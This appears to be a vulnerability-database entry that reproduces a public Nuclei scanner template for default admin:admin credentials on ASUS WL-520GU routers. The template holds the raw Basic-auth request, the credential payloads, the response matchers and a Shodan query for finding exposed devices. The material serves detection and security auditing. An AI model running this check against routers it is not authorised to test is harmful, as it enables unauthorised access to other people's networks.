asus-wl520GU-default-login: ASUS WL-520GU - Default Login

漏洞描述

ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found.

PoC代码[已公开]

id: asus-wl520GU-default-login

info:
  name: ASUS WL-520GU - Default Login
  author: ritikchaddha
  severity: high
  description: |
    ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found.
  metadata:
    verified: true
    max-request: 1
    shodan-query: "WL-520GU"
  tags: default-login,asus,wl-520gu,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ASUS'
          - 'WL-520GU'
          - "return 'Connected"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220451277af2a7f272f87e64b76baeb40f369e26391501a3ab17de43ac8f9332231022009197514600be21eaed410f3c28534290bddd17b266b6c46a7ba2526aa3a0350:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/asus/asus-wl520GU-default-login.yaml